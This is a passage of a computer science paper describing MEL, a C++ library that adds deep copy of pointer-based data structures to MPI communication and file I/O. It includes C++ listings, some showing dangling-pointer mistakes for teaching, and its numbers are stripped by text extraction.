in an mpi environment processes within the same node do not share a common address space making such an optimization unavailable. generally the more desirable solution is to avoid deep copy operations to maintain efficiency in message transmission. this is straightforward to achieve by converting user- defined types with pointer members to equivalent user-defined types with statically-sized arrays. this approach of restructuring and packing a data structure is often used by shared-memory programming paradigms where structures with pointers are manually whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ packed and unpacked across the device boundary to reduce transfer costs for data structures used on the device. when memory isolation (e.g., avoid cross boundary references) is not a requirement other approaches might be possible. for operations executed within sequential or shared memory multi-core processors, hardware can be used more efficiently by avoiding deep copy operations and rely instead on pointer exchange. this requires messages to have an ownership transfer semantics with calls to send (pass) ownership of memory regions, instead of their contents, between processes (friedley et al., ). in the context of the present work, we do not focus on ownership passing but on the traditional approach of refactoring code. mel provides an efficient and intuitive alternative to implementing object packing by hand. porting an object type to use mel deep copy only requires adding a member function to the type containing directives that describe the dependencies of the type. in this case, the additional effort to rewrite data structures to allow communication using the standard mpi shallow copy principles is much larger, making refactoring an application to avoid deep copy an undesirable solution. deep copy semantics are not only relevant when dealing with inter-process communication. when recovering from process or node failure in fault tolerant mpi, applications often incur problems very similar to the ones dealt by deep copy operations. fault tolerance plays an important role in high performance computing applications (herault & robert, ) and significant research has focused on its development in mpi (gropp & lusk, ; vishnu et al., ; bouteiller, ). while the library itself does not provide explicit fault-tolerance support, mpi can provide a standard and well- structured context for writing programs that exhibit significant degrees of fault tolerant behavior. several approaches have been investigated in literature to achieve fault tolerance in mpi (gropp & lusk, ; laguna et al., ), with check-pointing being one of the most commonly used compared to more sophisticated approaches involving direct manipulation of the mpi standard to support fault tolerance (fagg, bukovsky & dongarra, ; fagg & dongarra, ), or modifying semantics of standard mpi functions to provide resilience to program faults. in check-pointing, a process will periodically cache its work to disk so that in the event of a crash or node failure, a newly spawned process can load back the last saved state of the failed process and continue the work from there. when the data a process is dependent on is deep in structure, the implementation challenges associated with reading and writing the data to disk are the same ones encountered when handling the communication of such types. 
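to make the parallel with inter-process communication concrete, the following is a minimal sketch (not mel code; the struct and function names are illustrative assumptions) of why check-pointing a deep structure by its memory footprint alone is insufficient: the pointer written to the file refers to an address in the old process, so after a restart it is dangling and the array it pointed to is lost unless it is written and restored explicitly.

#include <fstream>

struct state { int len = 0; int *data = nullptr; };

// naive checkpoint: writes only the footprint of the struct. after a
// restart, state::data holds an address from the old process, so it is
// a dangling pointer and the array contents are lost.
void checkpoint_naive(const state &s, std::ofstream &file) {
    file.write((const char*) &s, sizeof(state));
}

// deep checkpoint: the pointed-to array is written explicitly (and on
// restore would be re-allocated and read back), which is the same
// traversal a deep copy between processes has to perform.
void checkpoint_deep(const state &s, std::ofstream &file) {
    file.write((const char*) &s, sizeof(state));
    if (s.data != nullptr && s.len > 0)
        file.write((const char*) s.data, sizeof(int) * s.len);
}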
mel provides support for fault-tolerance by leveraging deep copy semantics to transparently target file reads and writes in the same manner it handles the sending and receiving of inter-process communications. when to use deep copy it is important that programmers be aware of the dangers of shallow-copying deep types without also resolving any dependencies of that type. for example, if an object contains a pointer and is copied by its memory footprint to another mpi process the value of the contained pointer on the receiver is now dangling and accessing the pointed to whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ memory erroneous. listing shows an example of performing such an mpi shallow-copy when a deep copy was needed. listing user example–error from not resolving the data dependencies of an object when copying with mpi. struct somestruct { int *ptr = nullptr, len = ; }; //---------------------------------------------------// // on sending process somestruct myvar; // allocate sub array myvar.len = ; mpi_alloc_mem(myvar.len * sizeof(int), mpi_info_null, &(myvar. ptr)); // populate sub array with values... mpi_send(&myvar, sizeof(somestruct), mpi_byte, dst_rank, tag, comm); //---------------------------------------------------// // on receiving process somestruct myvar; mpi_recv(&myvar, sizeof(somestruct), mpi_byte, src_rank, tag, comm); // error! myvar.ptr is now a dangling reference to the memory of the sending process! while accessing the pointed to memory is invalid, if we declare as a rule that if a pointer is not allocated it will be assigned to nullptr (and we strictly adhere to this rule), we can use the value of the dangling pointer to determine if an allocation needs to be made and data received on the receiving process. listing gives a corrected example of listing , by deep copying a struct containing a pointer safely using native mpi commands. listing user example–hand coded deep copy using a dangling pointer from the sending process to determine if data needs to be received. struct somestruct { int *ptr = nullptr, len = ; whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ }; //---------------------------------------------------// // on sending process somestruct myvar; // allocate sub array myvar.len = ; mpi_alloc_mem(myvar.len * sizeof(int), mpi_info_null, &(myvar. ptr)); // populate sub array with values... // send the footprint of the struct, allowing the receiver to check //if ptr == nullptr or len == mpi_send(&myvar, sizeof(somestruct), mpi_byte, dst_rank, tag, comm); // resolve the dependency of the struct if (myvar.ptr != nullptr && myvar.len > ) { mpi_send(myvar.ptr, myvar.len, mpi_int, dst_rank, tag, comm); } //---------------------------------------------------// // on receiving process somestruct myvar; // receive the footprint of the struct so we can check if the array // needs receiving mpi_recv(&myvar, sizeof(somestruct), mpi_byte, src_rank, tag, comm); // resolve the dependency of the struct if (myvar.ptr != nullptr && myvar.len > ) { mpi_alloc_mem(myvar.len * sizeof(int), mpi_info_null, &(myvar. ptr)); mpi_recv(myvar.ptr, myvar.len, mpi_int, src_rank, tag, comm); } if an object which implements its own memory management through copy/move constructors and assignment operators, such as std::vector, is used, heap corruption can occur in a manner that can be difficult to debug. 
an example of this is shown in listing . whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ if a std::vector is copied by footprint its internal pointer, just like the raw pointer previously, is no longer valid. the vector class works on the assumption that its internal pointer is always valid, and that it needs to be de-allocated or re-allocated if any of the assignment, resize, or destructor functions are called. if the vector goes out of scope and its destructor is called the incurring segfault will often not be caught correctly by a debugger and the error will be reported “nearby,” leaving the programmer to hunt down the true source of the error. short of using the c++ placement-new operator to force the vector to be recreated without calling its destructor there is no way of “safely” recovering in this situation. listing user example–the dangers of copying deep types by their footprint in memory without fixing them properly on the receiving processes. struct somestruct { std::vector<int> somevec; }; //---------------------------------------------------// // on sending process somestruct myvar; // push_back into myvar.somevec a few times... mpi_send(&myvar, sizeof(somestruct), mpi_byte, dst_rank, tag, comm); // resolve the dependency of the struct if (myvar.somevec.size() > ) { mpi_send(&(myvar.somevec[ ]), myvar.somevec.size(), mpi_int, dst_rank, tag, comm); } //---------------------------------------------------// // on receiving process somestruct myvar; mpi_recv(&myvar, sizeof(somestruct), mpi_byte, src_rank, tag, comm); // if myvar goes out of scope we segfault! //myvar.somevec.clear(); // segfault! //myvar.somevec.resize( ); // segfault! //myvar.somevec.reserve( ); // segfault! //myvar.somevec = std::vector<int>();// segfault! whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ // etc... // it is safe to access .size() of the vector even if its internal // pointer is invalid, we can use this to create a new vector in // place, and to determine if we need to receive data. // force a new vector to be constructed at the memory address of the // existing one without calling the existing vector's destructor. new (&(myvar.somevec)) std::vector<int>(myvar.somevec.size()); // resolve the dependency of the struct if (myvar.somevec.size() > ) { mpi_recv(&(myvar.somevec[ ]), myvar.somevec.size(), mpi_int, src_rank, tag, comm); } buffered vs. non-buffered so far we have discussed methods for deep copying object types by recursively traversing the data-structure and performing discrete message operations to resolve each dependency. while often small there is a performance cost associated with beginning and ending a communication between processes, and this cost is exacerbated when communication occurs between processes on different physical nodes connected by a network interface. in many cases it is beneficial to pack a deep structure into a contiguous buffer on the sending process and to transport it as a single communication, the buffer can then be received and unpacked to reconstruct the target data structure. listing demonstrates a variant on listing where data is packed into a buffer before being transported and unpacked on the receiving process. 
while buffered deep copy enables greater performance when communicating large structures made up of many small objects between processes, this speed comes at the cost of increased code complexity and limitations on the size of data that can be transferred. in the scenario where the data to be deep copied occupies more than half of the available system memory buffering into a contiguous buffer is no longer applicable as there is no remaining space in memory to allocate the buffer. additionally, for programs that make many small allocations and de-allocations during normal execution system memory can become fragmented, leading to a situation where there is more than enough available memory to allocate the buffer but it is split up in many small pieces meaning no one contiguous allocation can be made. in these scenarios there is no alternative but to perform a non-buffered deep copy to move the data. whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ listing user example–hand coded buffered deep copy using a dangling pointer from the sending process to determine if data needs to be unpacked. struct somestruct { int *ptr = nullptr, len = ; }; //---------------------------------------------------// // on sending process somestruct myvar; // allocate sub array myvar.len = ; mpi_alloc_mem(myvar.len * sizeof(int), mpi_info_null, &(myvar. ptr)); // calculate buffer size and allocate space int buffer_size = sizeof(somestruct); if (myvar.ptr != nullptr && myvar.len > ) { buffer_size += (sizeof(int) * myvar.len); } char *buffer, *pos; mpi_alloc_mem(buffer_size, mpi_info_null, &buffer); pos = buffer; // pack the struct itself to move non-deep members memcpy(pos, &myvar, sizeof(somestruct)); pos += sizeof(somestruct); // pack the array of the struct if (myvar.ptr != nullptr && myvar.len > ) { memcpy(pos, myvar.ptr, sizeof(int) * myvar.len); pos += sizeof(int) * myvar.len; } // send the buffer mpi_send(buffer, buffer_size, mpi_byte, dst_rank, tag, comm); // free the buffer mpi_free_mem(buffer); //---------------------------------------------------// whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ // on receiving process somestruct myvar; // calculate buffer size and allocate space mpi_status status; mpi_probe(src_rank, tag, comm, &status); int buffer_size; mpi_get_count(&status, mpi_byte, &buffer_size); char *buffer, *pos; mpi_alloc_mem(buffer_size, mpi_info_null, &buffer); pos = buffer; // receive the buffer mpi_recv(buffer, buffer_size, mpi_byte, src_rank, tag, comm); // unpack the struct itself to move non-deep members memcpy(&myvar, pos, sizeof(somestruct)); pos += sizeof(somestruct); // unpack the array of the struct if (myvar.ptr != nullptr && myvar.len > ) { mpi_alloc_mem(myvar.len * sizeof(int), mpi_info_null, &(myvar. ptr)); memcpy(myvar.ptr, pos, sizeof(int) * myvar.len); pos += sizeof(int) * myvar.len; } // free the buffer mpi_free_mem(buffer); buffering may also perform worse than non-buffered methods when the data to be deep copied consists of a small number of large objects, such as a struct containing several pointers to large buffers. in this case it may be detrimental to force the local copying of the large buffers into a single message only to unpack them on the receiving process when it would have been faster to transport them separately while taking the hit on the overheads associated with setting up multiple communications. 
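as a rough illustration of how this trade-off might be handled in user code, the sketch below chooses between the two hand-coded variants shown in the listings above at run time. the helpers send_buffered and send_non_buffered, and the mem_budget_bytes parameter, are illustrative assumptions supplied by the application; they are not part of mpi or mel.

// hedged sketch: pick buffered or non-buffered transport for the
// somestruct type from the earlier listings, based on whether the
// packing buffer would fit in an application-supplied memory budget.
void send_struct(const somestruct &myvar, int dst_rank, int tag,
                 mpi_comm comm, size_t mem_budget_bytes) {
    size_t buffer_size = sizeof(somestruct);
    if (myvar.ptr != nullptr && myvar.len > 0)
        buffer_size += sizeof(int) * (size_t) myvar.len;

    if (buffer_size <= mem_budget_bytes) {
        // one contiguous buffer, one message (as in the buffered listing)
        send_buffered(myvar, dst_rank, tag, comm);
    } else {
        // not enough room to pack: footprint and sub-array are sent as
        // separate messages (as in the non-buffered listing)
        send_non_buffered(myvar, dst_rank, tag, comm);
    }
}

a more refined policy could also prefer the non-buffered path when the structure consists of a few large allocations, for the reasons discussed above.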
whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ mel–the mpi extension library mel is a c++ , header-only library, being developed with the goal of creating a lightweight and robust framework for building parallel applications on top of mpi. mel is designed to introduce no (or minimal) overheads while drastically reducing code complexity. it allows for a greater range of common mpi errors to be caught at compile- time rather than during program execution when it can be far more difficult to debug. a good example of this is type safety in the mpi standard. the standard does not dictate how many of the object types should be implemented leaving these details to the implementation vendor. for instance, in intel mpi . mpi_comm objects and many other types are implemented as integer handles, typedef int mpi_comm, to opaque data that are managed by the mpi run-time. a drawback with this approach is it causes compile time type-checking of function parameters to not flag erroneous combinations of variables. the common signature mpi_send(void*, int, mpi_datatype, int, int, mpi_comm) is actually seen by the compiler as mpi_send(void*, int, int, int, int, int), allowing any ordering of the last five variables to be compiled as valid mpi code, while potentially causing catastrophic failure at run-time. in contrast, open mpi . . implements these types as structs which are inherently type-safe. with mel we aim to: � remain true to the underlying design of mpi, by keeping to an imperative function interface that does not fundamentally change the way in which the programmer interacts with the mpi run-time. � to provide a type-safe, consistent, and unified function syntax that allows distributions of mpi from all vendors to behave in a common and predictable way at both compile- time and run-time. � to be soluble, allowing the compiler to remove the abstractions mel provides to achieve the same performance as native mpi code. � to be memory efficient by minimizing the use of intermediate buffers whenever possible. � to make use of modern c++ language features and advanced template meta programming to both ensure correctness at compile-time and to generate boiler-plate values that programmers have to provide themselves with native mpi code. � to give higher-level functionality that is not available from the mpi standard such as deep copy semantics (our focus in this paper). mel deep copy our algorithm is implemented in four parts, a top-level interface of functions for initiating deep copy as send/receive, broadcast, or file-io operation; a transport api of functions that describe how data is to be moved within a deep copy operation, a set of transport methods that describe generically how to move a region of memory; and a hash-map interface for tracking which parts of the data structure have already been traversed. figure shows the architecture of our algorithm. whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in order to ensure correct memory management for deep structures the user must adhere to: � unallocated pointers are initialized to nullptr. 
� dynamic memory must be allocated using mpi_alloc_mem and freed using mpi_free_mem, or the equivalent mel calls: t* mel::memalloc<t>(int len) t* mel::memalloc(int len, t &value) void mel::memfree(t *ptr) t* mel::memconstruct<t>(args &&...args) void mel::memdestruct(t *ptr, int len = ) � pointers refer to distinct allocations. e.g. it is erroneous to have an allocation of the form char *ptr = new char[ ] in one object, and to then have a weak-pointer into the array in subsequent objects: char *mysubptr = &ptr[ ]. in these situations, it is best to store integer offsets into the array, rather than the pointer address itself. top-level interface the top-level interface for our algorithm (listing ) consists of functions for initiating a deep copy as a send, receive, broadcast, or file access operation on a templated pointer (t*), a pointer-length pair (t*, len), an object reference (t&), or an stl container (std::vector<t>&, std::list<t>&). in the case of receiving methods (recv, bcast, and fileread) the len parameter can either be passed by reference so that it can be modified to reflect the number of elements that were actually received, or captured from an integer literal or constant variable to provide a run-time assertion whether the correct number of elements were received. all methods are blocking and do not return until the entire data-structure has been transferred. buffered variants of the top-level interface initiate a local deep copy to a contiguous buffer on the sender, this buffer is then sent as a single transport to the receiving processes where it can be unpacked. by decreasing the number of mpi communications or file figure mel deep copy architecture. whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ accesses needed to transfer a deep structure significant reductions in latency can be achieved, at the cost of added memory overhead from packing and unpacking data before and after transport. in general, large structures of small objects (i.e. a tree with many nodes that are small in memory) benefit most from buffering while smaller structures of large objects (i.e. a struct containing large arrays) tend to benefit from non-buffered transport. another motivating reason for providing a non-buffered mechanism for deep copy is the scenario where the deep structure occupies more than half of the available system memory. in such cases it is not possible to make a single contiguous allocation large enough to pack the structured data. an example of where this can happen is the use of mpi to distribute work to banks of intel xeon phi coprocessors which are exposed to the host system via a virtual network interface. while such hardware provides a large number of physical processor cores ( ) on card memory is reduced ( – gb). on larger systems with more available memory this is less likely to occur although the use of non-buffered methods may still be desirable for the reasons outlined above; and in any case, achieving low memory overhead is good practice. detecting objects that require deep copy determining whether a given object is “deep” or not is performed at compile time using c++ template meta-programming to detect the presence of a member function of the form template<typename msg> void deepcopy(msg &msg) that describes how to resolve the dependencies of a given object type. 
the template parameter msg is a shorthand for mel::deep::message<transport_method, hash_map> where transport_method and hash_map are types satisfying the constraints described in sections transport method and hashing shared pointers, respectively. a detailed example of the method used to detect the presence of a matching member function is given in section detecting the deep copy function using template meta-programming. the use of template meta-programming in c++ allows for the complete set of possible copy operations needed to transport a structure to be known at compile time, allowing the compiler to make optimizations that might otherwise not be possible if inheritance and virtual function calls were used. template programming also opens up the future possibility of using more advanced c++ type_traits such as std::is_pod<t> (is-plain-old-data) and other similar type traits to help make informed decisions about how best to move types automatically at compile time. listing mel implementation–mel deep copy top-level interface. // calculate buffer size needed to pack an object or array of objects. int mel::deep::buffersize(t &obj) int mel::deep::buffersize(t *&ptr) int mel::deep::buffersize(t *&ptr, const int len) int mel::deep::buffersize(stl &container) // ^ stl can (currently) be std::vector, std::list whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ // mpi_send void mel::deep::send(t &obj, const int dst, const int tag, const mel::comm &comm) void mel::deep::send(t *&ptr, ...) void mel::deep::send(t *&ptr, const int len, ...) void mel::deep::send(stl &container, ...) // mpi_recv void mel::deep::recv(t &obj, const int src, const int tag, const mel::comm &comm) void mel::deep::recv(t *&ptr, ...) void mel::deep::recv(t *&ptr, int const &len, ...) // ^ len matches int literals and constants - runtime assertion // on number of received elements void mel::deep::recv(t *&ptr, int &len, ...) // ^ len matches int variables by reference - gets set to the // number of received elements void mel::deep::recv(stl &container, ...) // mpi_broadcast void mel::deep::bcast(t &obj, const int root, const mel::comm &comm) void mel::deep::bcast(t *&ptr, ...) void mel::deep::bcast(t *&ptr, int const &len, ...) // ^ len matches int literals and constants - runtime assertion on // number of received elements void mel::deep::bcast(t *&ptr, int &len, ...) // ^ len matches int by reference - set on receivers to the number // of received elements void mel::deep::bcast(stl &container, ...) // stl file streams void mel::deep::filewrite(t &obj, std::ofstream &file) void mel::deep::fileread(t &obj, std::ifstream &file) // mpi_file void mel::deep::filewrite(t &obj, mel::file &file) void mel::deep::fileread(t &obj, mel::file &file) // overloads for buffered methods follow the same pattern void mel::deep::bufferedsend(t &obj, ...) void mel::deep::bufferedsend(t &obj, ..., const int buffersize) whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ // ^ source process can specify the buffer size to allocate for // packing the structure void mel::deep::bufferedrecv(t &obj, ...) // ^ buffer size on the recieving processes is determined from the // sender void mel::deep::bufferedbcast(t &obj, ...) void mel::deep::bufferedbcast(t &obj, ..., const int buffersize) // ^ buffer size only used on sender, ignored on receiving // processes void mel::deep::bufferedfilewrite(t &obj, ...) 
void mel::deep::bufferedfilewrite(t &obj, ..., const int buffersize) void mel::deep::bufferedfileread(t &obj, ...) because we use the same function for sending/receiving, buffered/non-buffered, and for point-to-point/collective/ or file access communications we make use of a utility type, message, that tracks which operation is being performed and where data is coming from or going to. the message object is created internally when one of the top-level functions is called and remains unmodified throughout the deep copy. message transport-api the deep copy function declares to our algorithm how data dependencies of a type need to be resolved in order to correctly rebuild a data structure on the receiving process. to keep the definition of this function simple the message object exposes a small api of functions (listing ) that abstract the details of how data is sent and received between processes. listing mel implementation–message transport-api. // transfer a deep object. only needed for deep types! // non-deep members are transported automatically void message::packvar(t &obj) // transfer a deep/non-deep pointer to len objects void message::packptr(t *&ptr, int len = ) // transfer a deep/non-deep pointer to len objects where the // pointer may also be referenced in whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ // other parts of the deep structure. (i.e. a graph structure // where multiple nodes point to a shared neighbour) void message::packsharedptr(t *&ptr, int len = ) // transfer a std::vector of deep/non-deep objects. void message::packstl(std::vector<t> &vec) // or a std::list (doubly linked list). void message::packstl(std::list<t> &lst) // or use the shorthand operators message& message::operator&(t &obj) // <- calls packvar which is // only defined for deep types message& message::operator&(std::vector<t> &vec) message& message::operator&(std::list<t> &lst) // only used in top level interface functions, these variants differ // only from their standard counterparts (above) in that they do not // assume the parent object has been transported as for the root // object there is no parent. void message::packrootvar(t &obj) void message::packrootptr(t *&ptr, int len = ) void message::packrootstl(std::vector<t> &vec) void message::packrootstl(std::list<t> &lst) listing gives an example usage of the message transport api to move a complex data-structure. all of the functions provided work transparently with both deep and non- deep types, with the exception of message::packvar which is intended only for the transport of deep types as non-deep member variables will be transported automatically. by comparison, boost serialization library requires that all types except for language defined base types (i.e. int, bool, double) provide serialization functions regardless of whether they contain deep members, and that all member variables within the type (including non-deep members) are explicitly registered with the archive object. listing mel implementation–registering dependencies using the transport-api. struct somedeepstruct { // non-deep members will be copied automatically. int a, b, c, len; someflatstruct d; // deep members must be declared in the deep-copy function anotherdeepstruct e, f, g; whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ char *myarray = nullptr; graphnode *mysharedpointer = nullptr; std::vector<int> v; std::vector<anotherdeepstruct> w; template<typename msg> void deepcopy(msg &msg) { // pack a deep object by reference. msg.packvar(e); // a lighter syntax for non-pointer members. msg & f & g; // transfer a char array of len elements. msg.packptr(myarray, len); // transfer a shared pointer that may also be used // elsewhere in the structure. msg.packsharedptr(mysharedpointer); // transfer a std::vector. msg.packstl(v); // we can also transfer a std::vector or std::list // using & syntax. msg & w; // in fact, we can simply replace all of the above // code (in this function) with: msg & e & f & g & v & w; msg.packptr(myarray, len); msg.packsharedptr(mysharedpointer); } }; an example copy in essence, the deep copy algorithm works by both sending and receiving processes entering a message loop or handshake with one another where they both expect to keep sending and receiving data until the entire structure has been transferred. the sending process determines how much data is to be sent, and this information is conveyed to the receiving processes transparently in such a way that when a receiving process determines there is nothing left to receive the sending process has returned. listing shows an example of using the deep copy function to move an array of non- deep objects. because the type, int, does not provide a member function for deep copy whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the footprint of the array is sent in a single mpi message. on the receiving process memory is allocated into the pointer provided and the data is received. listing user example–mel deep copy of non-deep type. // on sending process int len = ; int *ptr = mel::memalloc<int>(len); // fill ptr with some values... ptr = [ ..len) for (int i = ; i < len; ++i) ptr[i] = i; mel::deep::send(ptr, len, dst_rank, tag, comm); //---------------------------------------------------// // on receiving process int len; int *ptr = nullptr; mel::deep::recv(ptr, len, src_rank, tag, comm); // len = and ptr now equals an address to len integers // ptr = [ ..len) an example of moving an array of structs containing pointers to dynamically allocated memory is given in listing . in order to correctly reconstruct the data on receiving processes a deep copy function has been implemented which tells the algorithm to copy a char array containing len elements. because the type has a deep copy function the receiving processes will allocate the memory for the array of structs and copy the footprint of the array as a single contiguous chunk resulting in non-deep member variables being transferred automatically. the receiving process makes the necessary allocations to receive its dependencies. both sending and receiving processes will then loop over each element in their array and call the objects deep copy function to resolve its data dependencies. if the struct contained variables which themselves required a deep copy the algorithm would recurse on them until all dependencies are resolved. in this simple case, however, the struct contains a char array which does not require a deep copy and as such the sub-array is transferred by allocating the needed memory and copying the entire sub-array as one contiguous chunk, as in listing . listing user example–mel deep copy of deep type. struct somestruct { int len; char *array = nullptr; whittle et al. 
( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ template<typename msg> void deepcopy(msg &msg) { msg.packptr(array, len); } }; //---------------------------------------------------// // on sending process allocate array and subarrays int len = ; somestruct *ptr = mel::memalloc<somestruct>(len); for (int i = ; i < len; ++i) { // allocate sub array ptr[i].len = i + ; ptr[i].array = mel::memalloc<char>(ptr[i].len); // fill ptr[i].ptr with some values... ptr_i = [ ..len) for (int j = ; j < ptr[i].len; ++j) ptr[i].array[j] = j; } mel::deep::send(ptr, len, dst_rank, tag, comm); //---------------------------------------------------// // on receiving process int len; somestruct *ptr = nullptr; mel::deep::recv(ptr, len, src_rank, tag, comm); // len = and ptr equals an address to an array of structures // each having their respective lengths and subarrays // ptr = [ .. ) : { [ .. ), [ .. ), [ .. ), [ .. ), [ .. ) } transport method the message object represents how our algorithm traverses the deep structure and ensures that both sending and receiving processes independently come to the same conclusion on what order objects are traversed in with minimal communication. this traversal order is independent of, and identical for all deep copy operations. because of this we template the message object on a type that represents the specific nature of the data transportation we want to perform (i.e. message<transportsend> to perform deep copy as an mpi_send communication), allowing the same traversal scheme to be reused. as a part of our implementation we provide transport methods for a wide variety of data movement scenarios: whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ transportsend performs each transport call as a discrete mpi_send communication. transportrecv performs each transport call as a discrete mpi_recv communication. transportbcastroot performs each transport call as a discrete mpi_bcast com- munication, as a sender. transportbcast performs each transport call as a discrete mpi_bcast com- munication, as a receiver. transportfilewrite performs each transport call as a discrete mpi_filewrite operation. transportfileread performs each transport call as a discrete mpi_fileread operation. transportstlfilewrite performs each transport call as a discrete std::ofstream:: write. transportstlfileread performs each transport call as a discrete std::ifstream:: read. transportbufferwrite performs each transport call as a discrete std::memcpy to a contiguous memory buffer. transportbufferread performs each transport call as a discrete std::memcpy from a contiguous memory buffer. notransport this transport method acts as a sender but does not move any data. this method is used to implement the top-level interface functions for mel::deep::buffersize which counts how many bytes need to be moved without performing any transportation. adding additional transport methods is as simple as implementing a class with a public-member function of the form template<typename t> inline void transport(t *&ptr, const int len) that describes how to move a region of memory, and a public-static-member variable static constexpr bool source which tells the compiler whether or not this is a sending or a receiving transport method. this boolean is important as it tells the message object whether or not it needs to make allocations as it traverses the deep structure. 
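as an illustration of these requirements, the following is a hedged sketch of what a minimal user-defined transport method for writing to an stl file stream might look like; the class name and its members are assumptions modeled on the interface just described rather than the actual mel implementation.

#include <fstream>

// hedged sketch of a transport method: a transport() member that moves
// len objects of type t, plus a compile-time flag marking it as a sender.
class mytransportfilewrite {
private:
    std::ofstream &file; // state kept for the duration of the deep copy

public:
    static constexpr bool source = true; // writing, i.e. acting as a sender

    explicit mytransportfilewrite(std::ofstream &_file) : file(_file) {}

    template<typename t>
    inline void transport(t *&ptr, const int len) {
        file.write((const char*) ptr, sizeof(t) * len);
    }
};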
the transport method should also store any state variables need to maintain the transport over the duration of the deep copy. such state variables may be but are not limited to an mpi communicator and process rank, a file handle, or a pointer to an array used for buffering. hashing shared pointers when considering large structured data containing duplicate pointers the method used to track which parts of the structure have already been transported can have a significant impact on the traversal time. a hash-map is a natural choice for representing an unordered map between two pointers as it is efficient for random access lookups and insertions. whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ as with the transport method, the message object is also templated on the hash-map to use for pointer tracking, namely message<transport_method, hash_map = mel:: deep::pointerhashmap>. this allows for the user to provide an adapter to their own implementation of a hash-map specifically optimized for pointers or to provide an adapter type to a third-party hash-map implementation. to use a custom hash-map with any of the top-level functions simply override the default template parameter when initiating a deep copy operation. e.g. mel::deep:: send<int, mycustomhashmap>(ptr, len, dst, tag, comm); where mycustomhashmap exposes public-member functions of the form: template<typename t> inline bool find(t* oldptr, t* &ptr) template<typename t> inline void insert(t* oldptr, t* ptr) these functions are templated on the pointer type, t*, so that user provided hash-map adapters are able to use this extra type information to optimize hashing if needed. external deep copy functions so far we have discussed the use of deep copy functions and the transport api in cases where the deep copy function was a local member function of the type being considered. in some use cases, a structure may be defined in headers or libraries that cannot be modified easily (or at all). in such cases, we still would like to be able to define the deep copy semantics for the type without directly modifying its implementation. to enable this, we provide an overload of all the functions in the transport api and top-level interface that take an additional template parameter that is a handle to a global-free- function of the form template<typename msg> inline void mytypedeepcopy(mytype &obj, msg &msg) that takes by reference an instance of the object to transport and a message object to perform the deep copy. listing , shows the usage of external free deep copy functions with types needing deep copy. structb contains an internal member function for performing deep copy, while structa does not. passing an instance of structa to the top-level interface will result in incorrect results as its dependencies will not be resolved. by implementing a global-free- function that defines the deep copy requirements of structa, we can then tell the top-level interface to explicitly use that function to resolve external dependencies of the type. if we provide an external free function for structb which already has an internal deep copy function, the internal function is ignored and the free function explicitly given is used. listing user example–using external global-free-functions for deep copy. struct structa { std::vector<int> arr; }; whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ struct structb { std::list<int> lst; // internal - local member deep-copy function template<typename msg> void deepcopy(msg &msg) { msg & lst; } }; // external - global free deep-copy function template<typename msg> void structa_deepcopy(structa &obj, msg &msg) { msg & obj.arr; } // external - global free deep-copy function template<typename msg> void structb_deepcopy(structb &obj, msg &msg) { msg & obj.lst; } // example usage: structa sa; mel::deep::send(sa, dst, tag, comm); // ^ error! structa contains a std::vector but does not // have a deep-copy function mel::deep::send<structa, mel::deep::pointerhashmap, structa_deepcopy>(sa, dst, tag, comm); // ^ correct. uses external free function to perform the deep-copy structb sb; mel::deep::send(sb, dst, tag, comm); // ^ correct. uses internal member function to perform the deep-copy mel::deep::send<structb, mel::deep::pointerhashmap, structb_deepcopy>(sb, dst, tag, comm); // ^ correct. uses external free function (overrides // internal function) to perform the deep-copy whittle et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the same rules apply for providing external free functions to the transport api. listing , shows an example of this, where once again structa is a deep type that does not provide an internal deep copy function. structc is also deep and contains a std::list of structa. if the deep copy function of structc simply calls the ampersand operator or message:: packstl function (listing , lines , ) to transport the std::list then the instances of structa will be transported incorrectly as a non-deep type. in the same manner as with the top-level interface the free function to use to deep copy structa is given explicitly to message::packstl so that it can correctly resolve the dependencies of the deep structure. listing user example–using external global-free-functions for deep copy with the transport-api. struct structa { std::vector<int> arr; }; // external - global free deep-copy function template<typename msg> void structa_deepcopy(structa &obj, msg &msg) { msg & obj.arr; } struct structc { std::list<structa> lst; // internal - local member deep-copy function template<typename msg> void deepcopy(msg &msg) { //msg & lst; // <- error - structa has no internal // deep-copy function //msg.packstl(lst); // <- error msg.packstl<structa, structa_deepcopy>(lst); // <- correct } }; // example usage: structc sc; mel::deep::send(sc, 